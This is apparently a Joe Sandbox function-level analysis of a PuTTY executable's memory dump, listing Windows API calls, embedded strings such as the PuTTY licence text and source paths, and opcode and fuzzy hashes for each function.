Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Long$CheckItemMenu
String ID: '
API String ID: 1924917330-1997036262
Opcode ID: d1032c2b50a3b0e277285bd24ea4a84c41b65445d67831132adc40392e3e9450
Instruction ID: e3b14783858b5d56d2d13b5cd00198765e4299d7e4b9da62ce7523cc3479ec8d
Opcode Fuzzy Hash: d1032c2b50a3b0e277285bd24ea4a84c41b65445d67831132adc40392e3e9450
Instruction Fuzzy Hash: 6F111926B1856182FB509B2DE85573E2661BBCDBA0F644235DE5EC3BE4CE3CE4468F00

Function 00007FF6BB2BE210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2BE25D
DeleteFileA.KERNEL32 ref: 00007FF6BB2BE272
GetLastError.KERNEL32 ref: 00007FF6BB2BE27C
GetLastError.KERNEL32 ref: 00007FF6BB2BE287

Strings

Unable to delete '%s': %s, xrefs: 00007FF6BB2BE294

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorFileLast$CreateDelete
String ID: Unable to delete '%s': %s
API String ID: 3657518308-26304762
Opcode ID: f88e35c732a831ebd537cab3597428dc8e72801e86ae3bdb86b7c1507d9bfd73
Instruction ID: baeec896a47b38f1190ab6ec880659468760efe397313e4148cd2e371c6a9de7
Opcode Fuzzy Hash: f88e35c732a831ebd537cab3597428dc8e72801e86ae3bdb86b7c1507d9bfd73
Instruction Fuzzy Hash: 6A118221B1860342EB646B28AA4537E3292BF997B0F254734CA7AC6BE0DF3C95418B00

Function 00007FF6BB2A49A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32 ref: 00007FF6BB2A49DA
SetDlgItemTextA.USER32 ref: 00007FF6BB2A49F7
EndDialog.USER32 ref: 00007FF6BB2A4A17

Strings

%s Licence, xrefs: 00007FF6BB2A49C5
PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso, xrefs: 00007FF6BB2A49E8

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Text$DialogItemWindow
String ID: %s Licence$PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso
API String ID: 4005798191-2223775202
Opcode ID: fd1f42abe3cd0209208851b7c1641d25dc7e0621b27556c9dd1169b445761683
Instruction ID: eb25f8bb28ee1f7dfe8834ff247f98a802d97118aa01f4eef776c1cd20e7191e
Opcode Fuzzy Hash: fd1f42abe3cd0209208851b7c1641d25dc7e0621b27556c9dd1169b445761683
Instruction Fuzzy Hash: 96F06D20F1C44641FE54531EEA541FC1291BF8CBA0F544431CB2E86AF59D7DF8C68B01

Function 00007FF6BB348304 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6BB348329
GetProcAddress.KERNEL32 ref: 00007FF6BB34833F
FreeLibrary.KERNEL32 ref: 00007FF6BB348366

Strings

CorExitProcess, xrefs: 00007FF6BB348338
mscoree.dll, xrefs: 00007FF6BB348320

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d6973e17bc496016cd4fb618cf7a3af109a9dec541e1302f7f85ba07df1fe5bb
Instruction ID: 97d85b8110b4e819184c49fe24f64adf76d96266284431f3405aa26ff3dbeb96
Opcode Fuzzy Hash: d6973e17bc496016cd4fb618cf7a3af109a9dec541e1302f7f85ba07df1fe5bb
Instruction Fuzzy Hash: 8BF04F65B09A0291EE648B2CE48473D6360FF4D761F640235D76D855F4CF3DD5459B40

Function 00007FF6BB2D6830 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF6BB2D6865
GetSaveFileNameA.COMDLG32 ref: 00007FF6BB2D689A
GetOpenFileNameA.COMDLG32 ref: 00007FF6BB2D68A2
GetCurrentDirectoryA.KERNEL32 ref: 00007FF6BB2D68B7
SetCurrentDirectoryA.KERNEL32 ref: 00007FF6BB2D68D6

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CurrentDirectory$FileName$OpenSave
String ID:
API String ID: 3193246104-0
Opcode ID: 2690501dca7dade875b2b897561f17308de347c2434d0f14fb017918334d4c33
Instruction ID: 9057f001bfa729242ff2bc9609fb863ad3a2cd9d45e80994983d428911d8be96
Opcode Fuzzy Hash: 2690501dca7dade875b2b897561f17308de347c2434d0f14fb017918334d4c33
Instruction Fuzzy Hash: 43115122B4DA8246FA625B28FA5437D7290BF48790F654531DF9DC6AE0DF3CE9498B00

Function 00007FF6BB2F9960 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6BB2B4D10), ref: 00007FF6BB2F99B8
EnterCriticalSection.KERNEL32(?,?,?,00007FF6BB2B4D10), ref: 00007FF6BB2F99CC
LeaveCriticalSection.KERNEL32(?,?,?,00007FF6BB2B4D10), ref: 00007FF6BB2F99F4

Strings

h && !h->u.g.moribund, xrefs: 00007FF6BB2F9975
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c, xrefs: 00007FF6BB2F997C

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CriticalSection$CloseEnterHandleLeave
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h && !h->u.g.moribund
API String ID: 2394387412-2696147314
Opcode ID: 6c1ea2d5d334a5474e2d3f7726b1849e4878d2696f3646d827d77fd05d616895
Instruction ID: 8401ad9196e024e3c968c1eade27a51dc5f2d77b24eb1e12687766171ad2180e
Opcode Fuzzy Hash: 6c1ea2d5d334a5474e2d3f7726b1849e4878d2696f3646d827d77fd05d616895
Instruction Fuzzy Hash: D2214C26A0874296EB359B1AF59427D7760FB8D7A4F540131CB8E826B1EF7CE485C700

Function 00007FF6BB368204 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6BB36822C
_set_statfp.LIBCMT ref: 00007FF6BB368247
_set_statfp.LIBCMT ref: 00007FF6BB368263
_set_statfp.LIBCMT ref: 00007FF6BB36829F

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
Instruction ID: f6d65b018d68874925aea4f9102de8c78a013a6adf55ab11d733d4aa6b6fae1c
Opcode Fuzzy Hash: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
Instruction Fuzzy Hash: 71115E62E5CE1306FAA4156CE45637911417F5D3B4F180A37EF6FD66FA8E6CAC854300

Function 00007FF6BB28B5B0 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FF6BB28B5E8
SelectObject.GDI32 ref: 00007FF6BB28B5FF
MoveToEx.GDI32 ref: 00007FF6BB28B618
LineTo.GDI32 ref: 00007FF6BB28B62E
SelectObject.GDI32 ref: 00007FF6BB28B63E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ObjectSelect$CreateLineMove
String ID:
API String ID: 2487549907-0
Opcode ID: 7b6076d2cd598deea9e36787d361e0fa8dbdaa4a654c9685e3cd90f87fdfc705
Instruction ID: 2907dad05008924b5539f724aa463cdcff99c2774f4d2a44dfa7b8060ad9388b
Opcode Fuzzy Hash: 7b6076d2cd598deea9e36787d361e0fa8dbdaa4a654c9685e3cd90f87fdfc705
Instruction Fuzzy Hash: 5E116036F0952242EE148B1EBE4446C6250BF9DBB1B698135CF1DC3B70CE7EB8968B40

Function 00007FF6BB3532D8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6BB3548DF,?,?,00000000,00007FF6BB3547F2,?,?,?,?,?,00007FF6BB33E97A), ref: 00007FF6BB3532F7
FlsSetValue.KERNEL32(?,?,?,00007FF6BB3548DF,?,?,00000000,00007FF6BB3547F2,?,?,?,?,?,00007FF6BB33E97A), ref: 00007FF6BB353316
FlsSetValue.KERNEL32(?,?,?,00007FF6BB3548DF,?,?,00000000,00007FF6BB3547F2,?,?,?,?,?,00007FF6BB33E97A), ref: 00007FF6BB35333E
FlsSetValue.KERNEL32(?,?,?,00007FF6BB3548DF,?,?,00000000,00007FF6BB3547F2,?,?,?,?,?,00007FF6BB33E97A), ref: 00007FF6BB35334F
FlsSetValue.KERNEL32(?,?,?,00007FF6BB3548DF,?,?,00000000,00007FF6BB3547F2,?,?,?,?,?,00007FF6BB33E97A), ref: 00007FF6BB353360

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 246454f8cf3c1529ba939f3a27c3d7627f188343c35324c738e0a280999cbe11
Instruction ID: ecad95953f7b95c3eea1e53fce512b5fa12e9bde0f15798734a956e0fb0245a5
Opcode Fuzzy Hash: 246454f8cf3c1529ba939f3a27c3d7627f188343c35324c738e0a280999cbe11
Instruction Fuzzy Hash: B0112924E0D60242FA985369AA9117D6282BF4C7F0F144335EB3ED76F6EE2CE4424709

Function 00007FF6BB35316C Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35317D
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35319C
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3531C4
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3531D5
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3531E6

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5f2370b3af674a94681810d456460f325ffb9ccdd21f5c8679402cd0e081159c
Instruction ID: 9ba2191875d28266389adb536fd18a7c5c266c4cd9ba5256f3a99caf4fbe4967
Opcode Fuzzy Hash: 5f2370b3af674a94681810d456460f325ffb9ccdd21f5c8679402cd0e081159c
Instruction Fuzzy Hash: 88110C24A0860B02FAA9627D596217D12827F4D3B0F180735DB3FDA6F3ED2CF5425719

Function 00007FF6BB35D620 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB35D8C9

Part of subcall function 00007FF6BB34B648: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34B665

Strings

UTF-8, xrefs: 00007FF6BB35D84C
UTF-16LEUNICODE, xrefs: 00007FF6BB35D86D
ccs, xrefs: 00007FF6BB35D815

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: dffa8048dbd6ed0f39c45b5b08942489ff67eff1e2340aa91b99b214095a938d
Instruction ID: 606bdb5c51e33c780f569b509e1d4cdfcc08c22735977d84e88c8c39fb8c027b
Opcode Fuzzy Hash: dffa8048dbd6ed0f39c45b5b08942489ff67eff1e2340aa91b99b214095a938d
Instruction Fuzzy Hash: 3481BF36D0C20289F7754E3C8254A782BE4BF1DB48F559035CB2ED66F9DE2DB842874A

Function 00007FF6BB2A4750 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2A4A30: SetWindowTextA.USER32 ref: 00007FF6BB2A4A48
Part of subcall function 00007FF6BB2A4A30: GetWindowLongPtrA.USER32 ref: 00007FF6BB2A4A5F

LoadIconA.USER32 ref: 00007FF6BB2A479A
SendMessageA.USER32 ref: 00007FF6BB2A47B1

Part of subcall function 00007FF6BB2D6440: GetDesktopWindow.USER32 ref: 00007FF6BB2D6459
Part of subcall function 00007FF6BB2D6440: GetWindowRect.USER32 ref: 00007FF6BB2D6467
Part of subcall function 00007FF6BB2D6440: GetWindowRect.USER32 ref: 00007FF6BB2D6479
Part of subcall function 00007FF6BB2D6440: MoveWindow.USER32 ref: 00007FF6BB2D64D6

Part of subcall function 00007FF6BB2A5130: SendMessageA.USER32 ref: 00007FF6BB2A516E
Part of subcall function 00007FF6BB2A5130: GetClientRect.USER32 ref: 00007FF6BB2A5184
Part of subcall function 00007FF6BB2A5130: MapDialogRect.USER32 ref: 00007FF6BB2A519E

ShowWindow.USER32 ref: 00007FF6BB2A496F

Strings

Main, xrefs: 00007FF6BB2A47F0, 00007FF6BB2A4812

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Rect$MessageSend$ClientDesktopDialogIconLoadLongMoveShowText
String ID: Main
API String ID: 2039525433-521822810
Opcode ID: 4aa6b8d646250b61d622f2b16557da846823d767aef867618b51dcfb39bf99de
Instruction ID: 4fc2a403ba3ef8f5ae73d63e4e21ed1bd3f3ded3cbd832dfb7f4e2325a7d34ec
Opcode Fuzzy Hash: 4aa6b8d646250b61d622f2b16557da846823d767aef867618b51dcfb39bf99de
Instruction Fuzzy Hash: E0519435B0864241EE209B1AE6A06BEA790FB8DBD4F404136DF9DC77A6DF7CE1418B40

Function 00007FF6BB32AFA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6BB32B043

Strings

crypt32.dll, xrefs: 00007FF6BB32B021
%02x, xrefs: 00007FF6BB32B0C8
CryptProtectMemory, xrefs: 00007FF6BB32B039

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc
String ID: %02x$CryptProtectMemory$crypt32.dll
API String ID: 190572456-4241872374
Opcode ID: 2c7fe427a553e00de460fce67bfb611e2a7b6cfca6129fffe92826d221bd0509
Instruction ID: 717085c47883385b8c97b81893fcb9e7645749b3d0ae23ee735bb0b56bc5989a
Opcode Fuzzy Hash: 2c7fe427a553e00de460fce67bfb611e2a7b6cfca6129fffe92826d221bd0509
Instruction Fuzzy Hash: 0F416D15A18A4241FE159B2EA9913BD2391BF8DBC4F448035CE5DC7BB6EF3EE4468740

Function 00007FF6BB34B8AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

extralen <= maxsize - oldlen, xrefs: 00007FF6BB34BAB2
Microsoft Visual C++ Runtime Library, xrefs: 00007FF6BB34BB0F
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/memory.c, xrefs: 00007FF6BB34BAB3

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/memory.c$Microsoft Visual C++ Runtime Library$extralen <= maxsize - oldlen
API String ID: 1949149715-3753179605
Opcode ID: 316e80de3c96355ea0dbc2ada2f34456a7c7d27d54338f355fcb179216eba0a0
Instruction ID: 443aa478c6910392fe47bda34c6660f56003665a0c300fa59937505d5d5a1e46
